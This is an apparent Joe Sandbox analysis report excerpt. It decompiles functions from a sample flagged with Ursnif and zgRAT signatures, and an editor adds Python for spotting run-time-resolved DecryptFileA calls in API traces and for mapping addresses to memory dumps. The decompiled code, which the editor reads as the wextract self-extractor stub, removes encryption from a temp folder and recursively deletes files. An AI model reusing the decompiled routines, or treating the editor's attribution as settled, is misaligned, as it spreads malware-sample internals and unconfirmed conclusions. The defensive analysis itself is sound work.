                                                    				_t35 =  *0x4c51cd18; // 0x0
                                                    				if (_t35 != 0) goto 0x4c513141;
                                                    				_t36 =  *0x4c51cd04; // 0x0
                                                    				if (_t36 != 0) goto 0x4c513134; // executed
                                                    				_t11 = E00007FF67FF64C5160A4(_t49, __rbx, _t62, _t65, _t66, _t70, _t72, _t73); // executed
                                                    				if (_t11 == 0) goto 0x4c513236;
                                                    				_t38 =  *0x4c51cd18; // 0x0
                                                    				if (_t38 != 0) goto 0x4c513141;
                                                    				if (E00007FF67FF64C513F74(_t49) == 0) goto 0x4c513236;
                                                    				if (E00007FF67FF64C515FE4(_t28, _t50, _t65, _t66, _t72, _t73) == 0) goto 0x4c513236; // executed
                                                    				_t14 = E00007FF67FF64C5166C4(0, _t50, _t62, _t64, _t65, _t70, _t72, _t73, _t74); // executed
                                                    				if (_t14 == 0) goto 0x4c513236;
                                                    				GetSystemDirectoryA(??, ??);
                                                    				E00007FF67FF64C517BA8(0x105, _t49, _t50,  &_v568, _t65, _t66, "advapi32.dll");
                                                    				LoadLibraryA(??);
                                                    				if (_t49 == 0) goto 0x4c5131c9;
                                                    				GetProcAddress(??, ??);
                                                    				if (_t49 == 0) goto 0x4c5131c9;
                                                    				 *0x4c519650(); // executed
                                                    				FreeLibrary(??);
                                                    				_t44 =  *0x4c51cd04; // 0x0
                                                    				if (_t44 != 0) goto 0x4c513273;
                                                    				_t45 =  *0x4c51de60; // 0x0
                                                    				if (_t45 != 0) goto 0x4c513273;
                                                    				if (GetWindowsDirectoryA(??, ??) != 0) goto 0x4c51325a;
                                                    				r9d = 0;
                                                    				_v576 = 0;
                                                    				r8d = 0;
                                                    				_v584 = 0x10;
                                                    				E00007FF67FF64C514DCC( &_v296, "advapi32.dll", _t72, _t73);
                                                    				 *0x4c51d544 = E00007FF67FF64C517700();
                                                    				return E00007FF67FF64C518470(0, 0, _v24 ^ _t67 - 0x00000260);
                                                    			}

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: DirectoryLibrary$AddressAllocDecryptFileFreeLoadLocalProcSystemWindows
                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                    • API String ID: 3010855178-1173327654
                                                    • Opcode ID: d024e3d04dc16d6ff208cbe559824f9b5939ede8501c72ce14a45a05cbc0e3f3
                                                    • Instruction ID: ed11de111fb9f947d038ca11514017e970e4fee3103bf8dd80712d8dc2173b38
                                                    • Opcode Fuzzy Hash: d024e3d04dc16d6ff208cbe559824f9b5939ede8501c72ce14a45a05cbc0e3f3
                                                    • Instruction Fuzzy Hash: B8712A20E0C68386FB69BF1DA86927D3EA4AF94750F444037D9BDC2395DF2CE864C600
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
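Editor's reading of the function above, with an added example (the code is written for this page and is not Joe Sandbox output). The function resolves DecryptFileA at run time rather than importing it: GetSystemDirectoryA, a path join (the 0x105 bound and the "advapi32.dll" literal read as building <system dir>\advapi32.dll into a MAX_PATH+1 buffer), LoadLibraryA, GetProcAddress, a call through the stored pointer at 0x4c519650, then FreeLibrary. The only other string in the function is C:\Users\user\AppData\Local\Temp\IXP000.TMP\, so the call removes the EFS encryption attribute from the extraction directory before files are dropped into it. An IXP000.TMP directory under %TEMP%, together with the alpha/i386/mips/ppc strings in the next function, reads as the Microsoft wextract.exe (IExpress) self-extracting stub, which would make these functions the packaging rather than the payload the report's Ursnif and zgRAT signatures fired on; that is worth confirming against a clean wextract.exe before attributing the behaviour. Because the export is resolved by hand it never appears in the import table, so a static import check misses it and the check has to run over the API trace. The Python below ties each GetProcAddress result back to the LoadLibrary or GetModuleHandle handle it came from (GetModuleHandle is included because the third function on this page pairs it with GetProcAddress the same way) and reports every watched export that is later invoked, flagging targets inside an IXP temp directory. SAMPLE_TRACE, the handle and pointer values and the WATCHED_EXPORTS list are constructed for the example.

```python
"""Find an export resolved at run time and then called, from an API trace.

Added example for this page, not Joe Sandbox code.  SAMPLE_TRACE is a
constructed stand-in for the sequence decompiled in 00007FF64C5130EC;
handle and pointer values are made up.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import Any, Dict, Iterable, List


@dataclass(frozen=True)
class ApiEvent:
    api: str     # hooked API name, as a sandbox would log it
    args: tuple  # positional arguments as logged
    ret: int     # return value


# %TEMP%\IXP000.TMP\ style extraction directory (IXP plus three digits).
IXP_TEMP_RE = re.compile(r"\\Temp\\IXP\d{3}\.TMP(?:\\|$)", re.IGNORECASE)

# Calls that hand out a module handle later fed to GetProcAddress.
HANDLE_SOURCES = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA",
                  "LoadLibraryExW", "GetModuleHandleA", "GetModuleHandleW"}

# Exports a dropper has little reason to resolve by hand (constructed list).
WATCHED_EXPORTS = {"DecryptFileA", "DecryptFileW", "EncryptFileA", "EncryptFileW"}


def is_ixp_temp_path(path: str) -> bool:
    """True for paths inside an IXPnnn.TMP directory under a Temp folder."""
    return IXP_TEMP_RE.search(path) is not None


def find_dynamic_resolution(events: Iterable[ApiEvent]) -> List[Dict[str, Any]]:
    """Tie GetProcAddress results to the module handle they came from and
    report every watched export that is later invoked."""
    handles: Dict[int, str] = {}   # module handle -> module file name
    resolved: Dict[str, str] = {}  # export name -> module it was taken from
    findings: List[Dict[str, Any]] = []
    for idx, ev in enumerate(events):
        if ev.api in HANDLE_SOURCES and ev.ret:
            # GetModuleHandle(NULL) is the main image; log it as <self>.
            name = ev.args[0] if ev.args else None
            handles[ev.ret] = ntpath.basename(str(name)).lower() if name else "<self>"
        elif ev.api == "GetProcAddress" and ev.ret and len(ev.args) >= 2:
            hmod, export = ev.args[0], ev.args[1]
            if hmod in handles and export in WATCHED_EXPORTS:
                resolved[export] = handles[hmod]
        elif ev.api in resolved:
            # The indirect call *0x4c519650() shows up in a hooked trace as the
            # export itself; record it together with its first argument.
            target = str(ev.args[0]) if ev.args else ""
            findings.append({
                "index": idx,
                "export": ev.api,
                "module": resolved[ev.api],
                "target": target,
                "ixp_temp": is_ixp_temp_path(target),
            })
    return findings


SAMPLE_TRACE = [  # constructed; mirrors the decompiled call order
    ApiEvent("GetSystemDirectoryA", (0x2A1F00, 0x105), 19),
    ApiEvent("LoadLibraryA", ("C:\\Windows\\system32\\advapi32.dll",), 0x7FFB1A2B0000),
    ApiEvent("GetProcAddress", (0x7FFB1A2B0000, "DecryptFileA"), 0x7FFB1A2C1234),
    ApiEvent("DecryptFileA", ("C:\\Users\\user\\AppData\\Local\\Temp\\IXP000.TMP\\", 0), 1),
    ApiEvent("FreeLibrary", (0x7FFB1A2B0000,), 1),
    ApiEvent("GetWindowsDirectoryA", (0x2A2100, 0x104), 10),
]


if __name__ == "__main__":
    for hit in find_dynamic_resolution(SAMPLE_TRACE):
        flag = " (IXP temp dir)" if hit["ixp_temp"] else ""
        print(f"#{hit['index']} {hit['module']}!{hit['export']}({hit['target']!r}){flag}")
```

The handle map is keyed on the value GetProcAddress is called with, not on the DLL name, so a handle obtained once and reused for several exports is attributed correctly; a GetProcAddress on a handle the trace never saw created is ignored rather than guessed at.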

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    • Control-flow graph (rendered as an image in the report): function 00007FF64C5164E4, basic blocks 505-550 covering 7ff64c5164e4-7ff64c5166bc; API calls on the graph: GetSystemInfo, CreateDirectoryA, RemoveDirectoryA.
                                                    C-Code - Quality: 65%
                                                    			E00007FF67FF64C5164E4(void* __edx, long long __rbx, void* __rcx, long long __rsi, void* __r8, long long _a16, long long _a24) {
                                                    				void* _v8;
                                                    				signed int _v24;
                                                    				char _v296;
                                                    				signed short _v344;
                                                    				void* __rdi;
                                                    				void* _t20;
                                                    				intOrPtr _t21;
                                                    				intOrPtr _t24;
                                                    				void* _t25;
                                                    				signed int _t27;
                                                    				void* _t33;
                                                    				signed int _t34;
                                                    				intOrPtr _t49;
                                                    				signed int _t52;
                                                    				intOrPtr _t55;
                                                    				void* _t61;
                                                    				signed long long _t63;
                                                    				char* _t89;
                                                    				void* _t91;
                                                    				void* _t95;
                                                    				void* _t96;
                                                    				void* _t107;
                                                    				void* _t109;
                                                    
                                                    				_t93 = __rsi;
                                                    				_a16 = __rbx;
                                                    				_a24 = __rsi;
                                                    				_t63 =  *0x4c51c008; // 0xdeba5460e397
                                                    				_v24 = _t63 ^ _t96 - 0x00000170;
                                                    				_t107 = __rcx;
                                                    				if (__edx == 0) goto 0x4c5165df;
                                                    				_t4 =  &_v296; // 0x144, executed
                                                    				_t89 = _t4;
                                                    				_t20 = E00007FF67FF64C5163B8(__rbx, __rcx, _t89, __rcx, _t109); // executed
                                                    				if (_t20 == 0) goto 0x4c516688;
                                                    				_t5 =  &_v296; // 0x144
                                                    				_t6 = _t89 + 0x7ffffefa; // 0x7ffffffe
                                                    				if (_t6 == 0) goto 0x4c516560;
                                                    				_t21 =  *((intOrPtr*)(_t5 - 0x4c51d610 + 0x4c51d610));
                                                    				_t49 = _t21;
                                                    				if (_t49 == 0) goto 0x4c516560;
                                                    				 *0x4c51d610 = _t21;
                                                    				if (_t49 != 0) goto 0x4c516541;
                                                    				_t67 =  !=  ? 0x7ff64c51d611 : 0x7ff64c51d60f;
                                                    				 *((char*)(0x7ff64c51d60f)) = 0;
                                                    				if (( *0x4c51de64 & 0x00000020) == 0) goto 0x4c5165cc;
                                                    				GetSystemInfo(??);
                                                    				_t34 = _v344 & 0x0000ffff;
                                                    				_t52 = _t34;
                                                    				if (_t52 == 0) goto 0x4c5165bb;
                                                    				if (_t52 == 0) goto 0x4c5165b2;
                                                    				if (_t52 == 0) goto 0x4c5165a9;
                                                    				if (_t34 != 1) goto 0x4c5165cc;
                                                    				goto 0x4c5165c2;
                                                    				goto 0x4c5165c2;
                                                    				goto 0x4c5165c2;
                                                    				E00007FF67FF64C517BA8(0x104,  !=  ? 0x7ff64c51d611 : 0x7ff64c51d60f, 0x4c51d610, 0x4c51d610, __rsi, _t95, "i386");
                                                    				E00007FF67FF64C517BA8(0x104,  !=  ? 0x7ff64c51d611 : 0x7ff64c51d60f, 0x4c51d610, 0x4c51d610, _t93, _t95, 0x4c519700);
                                                    				goto 0x4c51661e;
                                                    				_t13 = _t91 + 0x7ffffefa; // 0x7ffffffe
                                                    				if (_t13 == 0) goto 0x4c516610;
                                                    				_t24 =  *((intOrPtr*)(_t107 - 0x4c51d610 + 0x4c51d610));
                                                    				_t55 = _t24;
                                                    				if (_t55 == 0) goto 0x4c516610;
                                                    				 *0x4c51d610 = _t24;
                                                    				if (_t55 != 0) goto 0x4c5165f1;
                                                    				_t70 =  !=  ? 0x7ff64c51d611 : 0x7ff64c51d60f;
                                                    				 *((char*)(0x7ff64c51d60f)) = 0;
                                                    				_t25 = E00007FF67FF64C516B70(_t33,  !=  ? 0x7ff64c51d611 : 0x7ff64c51d60f, 0x4c51d610, 0x4c51d610, _t93, _t95); // executed
                                                    				if (_t25 != 0) goto 0x4c516649;
                                                    				if (CreateDirectoryA(??, ??) == 0) goto 0x4c51667d;
                                                    				 *0x4c51cd00 = 1;
                                                    				if (r8d == 0) goto 0x4c51668c;
                                                    				r8d = 0;
                                                    				_t27 = E00007FF67FF64C516CA4(r8d, 0x4c51d610, 0x4c51d610, _t91 - 1, _t93, 0x4c519700, _t107 - 0x4c51d610, _t109); // executed
                                                    				if (_t27 != 0) goto 0x4c51668c;
                                                    				_t61 =  *0x4c51cd00 - _t27; // 0x0
                                                    				if (_t61 == 0) goto 0x4c516688;
                                                    				 *0x4c51cd00 =  *0x4c51cd00 & _t27;
                                                    				RemoveDirectoryA(??);
                                                    				goto 0x4c516688;
                                                    				 *0x4c51d544 = E00007FF67FF64C517700();
                                                    				goto 0x4c516698;
                                                    				 *0x4c51d544 =  *0x4c51d544 & 0x00000000;
                                                    				return E00007FF67FF64C518470(1, _t34, _v24 ^ _t96 - 0x00000170);
                                                    			}

                                                    APIs
                                                    • GetSystemInfo.KERNEL32(?,?,?,?,?,?,0000000A,00007FF64C512CE1), ref: 00007FF64C51657C
                                                    • CreateDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF64C512CE1), ref: 00007FF64C51662F
                                                    • RemoveDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF64C512CE1), ref: 00007FF64C51666F
                                                      • Part of subcall function 00007FF64C5163B8: RemoveDirectoryA.KERNELBASE(0000000A,00007FF64C512CE1), ref: 00007FF64C516423
                                                      • Part of subcall function 00007FF64C5163B8: GetFileAttributesA.KERNELBASE ref: 00007FF64C516432
                                                      • Part of subcall function 00007FF64C5163B8: GetTempFileNameA.KERNEL32 ref: 00007FF64C51645B
                                                      • Part of subcall function 00007FF64C5163B8: DeleteFileA.KERNEL32 ref: 00007FF64C516473
                                                      • Part of subcall function 00007FF64C5163B8: CreateDirectoryA.KERNEL32 ref: 00007FF64C516484
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                    • API String ID: 1979080616-3374052426
                                                    • Opcode ID: 46ce37abadc5027e1bb67ef9580c9553c9e3bc3d3873299fa6b8c7dc3ad8012b
                                                    • Instruction ID: b6fddfa05a82f7789178e2ea8f7528a38c5dc90349086c1647f1c96eda35415d
                                                    • Opcode Fuzzy Hash: 46ce37abadc5027e1bb67ef9580c9553c9e3bc3d3873299fa6b8c7dc3ad8012b
                                                    • Instruction Fuzzy Hash: BF518F21E0D78285FA59BF2DA8182BD6FA4EF45780F994137C96E83395DF7DE824C200
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
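Added example for reading the Memory Dump Source lists on this page (editor's code, not part of Joe Sandbox). The decompiler prints the module's globals truncated to 32 bits (the stack cookie at 0x4c51c008, the state words at 0x4c51cd18 and 0x4c51d544, the path buffer at 0x4c51d610, the pointer slot at 0x4c519650), while each dump name carries the full 64-bit base of the region it was taken from together with a protection value and a region type. The dump-name layout below is an assumption read off the six names listed above and the snapshot file name hcaresult_0_2_7ff64c510000_Informazion.jbxd: <process index>.<snapshot index>.<dump id>.<base>.<PAGE_* protection>.<field 6>.<MEM_* type>.<field 8>.sdmp; fields 6 and 8 are not explained by the report and are kept as opaque integers. The code widens a truncated address with the image base and picks the dump whose base is the highest one not above it; the names carry no region size, so a region is assumed to run up to the next listed base.

```python
"""Map an address from the decompile to the Joe Sandbox memory dump holding it.

Added example for this page, not Joe Sandbox code.  Assumed dump-name layout
(read off the names listed for this function and the snapshot file name
hcaresult_0_2_7ff64c510000_Informazion.jbxd):
  <process>.<snapshot>.<dump id>.<base>.<PAGE_* protect>.<field6>.<MEM_* type>.<field8>.sdmp
Fields 6 and 8 are not explained on the page and are kept as opaque integers.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Windows page protection constants (winnt.h); only the low byte is named.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
# MEMORY_BASIC_INFORMATION.Type values (winnt.h).
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

DUMP_NAME_RE = re.compile(
    r"^(\d+)\.(\d+)\.(\d+)\.([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})"
    r"\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    name: str
    process: int
    snapshot: int
    dump_id: int
    base: int
    protect: int
    mem_type: int
    field6: int
    field8: int

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:X}")

    @property
    def executable(self) -> bool:
        return bool(self.protect & 0xF0)  # every PAGE_EXECUTE* value sits in the high nibble

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:X}")


def parse_dump_name(name: str) -> DumpRegion:
    m = DUMP_NAME_RE.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name}")
    proc, snap, dump_id, base, prot, f6, mtype, f8 = m.groups()
    return DumpRegion(name, int(proc), int(snap), int(dump_id), int(base, 16),
                      int(prot, 16), int(mtype, 16), int(f6, 16), int(f8, 16))


def widen(addr: int, image_base: int) -> int:
    """The IDA plugin prints image globals truncated to 32 bits (0x4c51cd18 for
    0x7ff64c51cd18); restore the high dword from the image base."""
    return (image_base & ~0xFFFFFFFF) | (addr & 0xFFFFFFFF)


def locate(addr: int, dumps: List[DumpRegion]) -> Optional[DumpRegion]:
    """Dump whose base is the highest one not above addr.  The names carry no
    region size, so a region is assumed to run up to the next listed base."""
    hit = None
    for region in sorted(dumps, key=lambda d: d.base):
        if region.base <= addr:
            hit = region
        else:
            break
    return hit


IMAGE_BASE = 0x7FF64C510000  # "Offset: 00007FF64C510000" in the report
REPORT_DUMPS = [parse_dump_name(n) for n in (  # the six dumps listed above
    "00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp",
    "00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp",
)]


def dump_for_global(addr: int) -> Optional[DumpRegion]:
    """Dump to open for an address as printed in the decompile of this sample."""
    return locate(widen(addr, IMAGE_BASE), REPORT_DUMPS)


if __name__ == "__main__":
    for a in (0x4C5130EC, 0x4C51C008, 0x4C51CD18, 0x4C519650):
        r = dump_for_global(a)
        print(f"0x{widen(a, IMAGE_BASE):X} -> {r.name} ({r.protect_name}, {r.type_name})")
```

With the six dumps listed for this function, 0x4c5130ec lands in the PAGE_EXECUTE_READ region at 7FF64C511000 (code), the globals 0x4c51c008, 0x4c51cd18 and 0x4c51d610 land in the PAGE_READWRITE region at 7FF64C51C000 (writable data), and the slot 0x4c519650 that both E00007FF67FF64C5130EC and E00007FF67FF64C512C54 call through lands in the PAGE_READONLY region at 7FF64C519000; those are the dump files to open when the decompile shows `*0x4c519650()` and you need the pointer's value at snapshot time.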

                                                    Control-flow Graph

                                                    C-Code - Quality: 27%
                                                    			E00007FF67FF64C512C54(void* __rax, long long __rbx, long long __rcx, long long __rsi, long long __r8, long long _a8, long long _a16) {
                                                    				intOrPtr _v16;
                                                    				intOrPtr _v24;
                                                    				long _t15;
                                                    				void* _t20;
                                                    				intOrPtr _t27;
                                                    				intOrPtr _t29;
                                                    				void* _t45;
                                                    				intOrPtr _t48;
                                                    				signed short _t52;
                                                    				intOrPtr _t62;
                                                    				long long _t64;
                                                    				void* _t73;
                                                    				void* _t74;
                                                    
                                                    				_a8 = __rbx;
                                                    				_a16 = __rsi;
                                                    				_t56 = __r8;
                                                    				_t15 = GetVersion();
                                                    				if (_t15 < 0) goto 0x4c512cc3;
                                                    				if (_t15 - 6 < 0) goto 0x4c512cc3;
                                                    				GetModuleHandleW(??);
                                                    				if (__rax == 0) goto 0x4c512cc3;
                                                    				GetProcAddress(??, ??);
                                                    				if (__rax == 0) goto 0x4c512cc3;
                                                    				r9d = 0;
                                                    				r8d = 0;
                                                    				 *0x4c519650();
                                                    				_t64 = __r8;
                                                    				 *0x4c51d544 = 0;
                                                    				_t61 = __rcx;
                                                    				if (E00007FF67FF64C512DB4(__r8, __rcx, __r8) == 0) goto 0x4c512d7f; // executed
                                                    				_t20 = E00007FF67FF64C5130EC(_t56); // executed
                                                    				E00007FF67FF64C5161EC(_t56, _t64); // executed
                                                    				if (_t20 == 0) goto 0x4c512d7f;
                                                    				_t45 =  *0x4c51cd1a - sil; // 0x0
                                                    				if (_t45 != 0) goto 0x4c512d7f;
                                                    				if ((dil & 0x00000001) == 0) goto 0x4c512d7f;
                                                    				if ((dil & 0x00000002) != 0) goto 0x4c512d2d;
                                                    				_t48 =  *0x4c51d540; // 0x0
                                                    				if (_t48 != 0) goto 0x4c512d2d;
                                                    				_t29 =  *0x4c51de7c; // 0x0
                                                    				if (_t29 == E00007FF67FF64C512318( *0x4c51de78 & 0x0000ffff, _t56)) goto 0x4c512d7f;
                                                    				if ((dil & 0x00000004) != 0) goto 0x4c512d5e;
                                                    				_v16 = 4;
                                                    				r9d = 0;
                                                    				_v24 = 0x40;
                                                    				if (E00007FF67FF64C514DCC(_t61, 0x4c519700, _t73, _t74) != 6) goto 0x4c512d7f;
                                                    				_t52 =  *0x4c51de78; // 0x3
                                                    				if (_t52 != 0) goto 0x4c512d7a;
                                                    				ExitWindowsEx(??, ??);
                                                    				goto 0x4c512d7f;
                                                    				E00007FF67FF64C511C0C();
                                                    				_t62 =  *0x4c51c830; // 0x0
                                                    				if (_t62 == 0) goto 0x4c512d97;
                                                    				CloseHandle(??);
                                                    				_t27 =  *0x4c51d544; // 0x0
                                                    				return _t27;
                                                     			}

                                                     Instruction addresses, one per decompiled line above, in order: 0x7ff64c512c54, 0x7ff64c512c59, 0x7ff64c512c63, 0x7ff64c512c69, 0x7ff64c512c79, 0x7ff64c512c7d, 0x7ff64c512c86, 0x7ff64c512c95, 0x7ff64c512ca1, 0x7ff64c512cb0, 0x7ff64c512cb2, 0x7ff64c512cb8, 0x7ff64c512cbd, 0x7ff64c512cc3, 0x7ff64c512cc6, 0x7ff64c512ccc, 0x7ff64c512cd6, 0x7ff64c512cdc, 0x7ff64c512ce3, 0x7ff64c512cea, 0x7ff64c512cf0, 0x7ff64c512cf7, 0x7ff64c512d07, 0x7ff64c512d0d, 0x7ff64c512d0f, 0x7ff64c512d15, 0x7ff64c512d1e, 0x7ff64c512d2b, 0x7ff64c512d31, 0x7ff64c512d33, 0x7ff64c512d42, 0x7ff64c512d45, 0x7ff64c512d5c, 0x7ff64c512d5e, 0x7ff64c512d65, 0x7ff64c512d6c, 0x7ff64c512d78, 0x7ff64c512d7a, 0x7ff64c512d7f, 0x7ff64c512d89, 0x7ff64c512d8b, 0x7ff64c512d97, 0x7ff64c512dac

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                     • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: Handle$AddressCloseExitModuleProcVersionWindows
                                                    • String ID: @$HeapSetInformation$Kernel32.dll
                                                    • API String ID: 1302179841-1204263913
                                                    • Opcode ID: d0bfb26a70778e8c6dce021e27be85d7a0cec3bff586eb98b8bfca0f5ba54e91
                                                    • Instruction ID: 4147dbd7afd34ac138e8e3ea94c44f8dbef928292f3d54ba86770ee9e9544747
                                                    • Opcode Fuzzy Hash: d0bfb26a70778e8c6dce021e27be85d7a0cec3bff586eb98b8bfca0f5ba54e91
                                                    • Instruction Fuzzy Hash: 4E313A31E1CA4286FB6DBF28F84827D7EA0AF59B54F444137DA2DC2399DF2CE4618640
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 58%
                                                    			E00007FF67FF64C51204C(long long __rbx, char* __rcx, void* __rdx, long long __rsi) {
                                                    				void* __rbp;
                                                    				char _t35;
                                                    				char _t38;
                                                    				int _t47;
                                                    				int _t49;
                                                    				void* _t51;
                                                    				char _t57;
                                                    				char _t61;
                                                    				signed long long _t68;
                                                    				char* _t73;
                                                    				void* _t78;
                                                    				char* _t81;
                                                    				char* _t103;
                                                    				void* _t104;
                                                    				CHAR* _t110;
                                                    				CHAR* _t116;
                                                    				void* _t117;
                                                    				void* _t119;
                                                    				signed long long _t120;
                                                    				CHAR* _t129;
                                                    
                                                    				 *((long long*)(_t119 + 0x10)) = __rbx;
                                                    				 *((long long*)(_t119 + 0x18)) = __rsi;
                                                    				_t117 = _t119 - 0x180;
                                                    				_t120 = _t119 - 0x280;
                                                    				_t68 =  *0x4c51c008; // 0xdeba5460e397
                                                    				 *(_t117 + 0x170) = _t68 ^ _t120;
                                                    				if ( *__rcx == 0) goto 0x4c512213;
                                                    				r15d = 0x104;
                                                    				_t81 = _t117 + 0x60;
                                                    				_t78 = __rcx - _t117 + 0x60;
                                                    				if (__rdx + 0x7ffffefa == 0) goto 0x4c5120bb;
                                                    				_t35 =  *((intOrPtr*)(_t78 + _t81));
                                                    				_t57 = _t35;
                                                    				if (_t57 == 0) goto 0x4c5120bb;
                                                    				 *_t81 = _t35;
                                                    				if (_t57 != 0) goto 0x4c51209d;
                                                    				_t73 =  !=  ? _t81 + 1 : _t81 + 1 - 1;
                                                    				 *_t73 = 0;
                                                    				E00007FF67FF64C511084(_t117 + 0x60, _t129, "*");
                                                    				FindFirstFileA(_t129); // executed
                                                    				if (_t73 == 0xffffffff) goto 0x4c512213;
                                                    				_t103 = _t117 + 0x60;
                                                    				if ( &(_t129[0x7ffffefa]) == 0) goto 0x4c512123;
                                                    				_t38 =  *((intOrPtr*)(_t78 + _t103));
                                                    				_t61 = _t38;
                                                    				if (_t61 == 0) goto 0x4c512123;
                                                    				 *_t103 = _t38;
                                                    				_t104 = _t103 + 1;
                                                    				if (_t61 != 0) goto 0x4c512105;
                                                    				_t75 =  !=  ? _t104 : _t104 - 1;
                                                    				 *((char*)( !=  ? _t104 : _t104 - 1)) = 0;
                                                    				if (( *(_t120 + 0x20) & 0x00000010) == 0) goto 0x4c5121a3;
                                                    				if (lstrcmpA(_t110) == 0) goto 0x4c5121d9;
                                                    				if (lstrcmpA(_t116) == 0) goto 0x4c5121d9;
                                                    				E00007FF67FF64C511084(_t117 + 0x60, _t129, _t120 + 0x4c);
                                                    				E00007FF67FF64C517BA8(r15d,  !=  ? _t104 : _t104 - 1, _t78, _t117 + 0x60, _t73, _t117, 0x4c519700);
                                                    				E00007FF67FF64C51204C(_t78, _t117 + 0x60, _t129, _t73);
                                                    				goto 0x4c5121d9;
                                                    				E00007FF67FF64C511084(_t117 + 0x60, _t129, _t120 + 0x4c);
                                                    				SetFileAttributesA(??, ??); // executed
                                                    				DeleteFileA(??); // executed
                                                    				_t47 = FindNextFileA(??, ??); // executed
                                                    				if (_t47 != 0) goto 0x4c5120fe;
                                                    				FindClose(??);
                                                    				_t49 = RemoveDirectoryA(??); // executed
                                                    				return E00007FF67FF64C518470(_t49, _t51,  *(_t117 + 0x170) ^ _t120);
                                                     			}

